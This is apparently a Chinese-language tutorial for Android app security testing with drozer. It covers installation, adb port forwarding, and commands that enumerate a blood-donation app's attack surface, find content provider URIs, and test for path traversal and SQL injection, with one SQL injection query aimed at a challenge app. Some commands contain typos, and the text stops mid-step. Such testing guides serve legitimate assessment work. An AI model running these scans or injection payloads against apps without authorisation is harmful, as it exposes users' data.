下载drozer-installer-2.3.4.zip
2,解压缩
3,winddows上安装setup.exe
手机安全agent.apk
4,手机打开agent,点击【开】
5,电脑,配置好adb命令工具(参考《手机自动化环境搭建手册V1.0(appium+java+eclipse).docx》)
6,cmd下输入
adb forward tcp:31415 tcp:31415
再输入:drozer.bat console connect,出现如下图,证明环境通过
1,查看待测试的应用包名称: run app.package.list -f 关键字 得到 com.shinow.donor
2,列举出APP的详细信息: run app.package.info -a com.shinow.donor
3,确认攻击面:run app.package.attacksurface com.shinow.donor
4,获取该Attack Surface的信息:run app.activity.info -a com.shinow.donor/run app.broadcast.info -a com.shinow.donor/run app.service.info -a com.shinow.donor
5,Content Provider的具体信息,权限:run app.provider.info -a com.shinow.donor
6,查看Content Provider的URI(数据泄露): run scanner.provider.finduris –a com.shinow.donor
7,检测是否存在遍历文件漏洞:run scanner.provider.traversal -a com.shinow.donor
8,检测是否存在SQL注入:runscanner.provider.injection –a com.shinow.donor
利用SQL注入
runscanner.provider.query content://com.example.bsideschallenge.evilPlannerdb--projection "* from cards --"
实例apk:爱献血
1, windows打开cmd命令窗口,手机打开agent.apk应用,打开server,打开调试模式
2, cmd下执行一下命令
查看手机是否能被电脑正确识别:adb devices
端口通讯:adb forward tcp:31415 tcp:31415
连通手机:drozer.bat console connect(在drozer安装路径下执行)
3, 测试执行:
(1)查看app全称:run app.package.list –f shinow
(2)列举出APP的详细信息: run app.package.info -acom.shinow.donor
(3)确认攻击面:runapp.package.attacksurface com.shinow.donor
(4)获取该Attack Surface的信息:
runapp.activity.info -a com.shinow.donor
runapp.broadcast.info -a com.shinow.donor
runapp.service.info -a com.shinow.donor
(5)Content Provider的具体信息:run app.provider.info -acom.shinow.donor
(6)查看Content Provider的URI(数据泄露):run scanner.provider.finduris –acom.shinow.donor
(7)检测是否存在遍历文件漏洞:run scanner.provider.traversal -a com.shinow.donor
(8)检测是否存在SQL注入: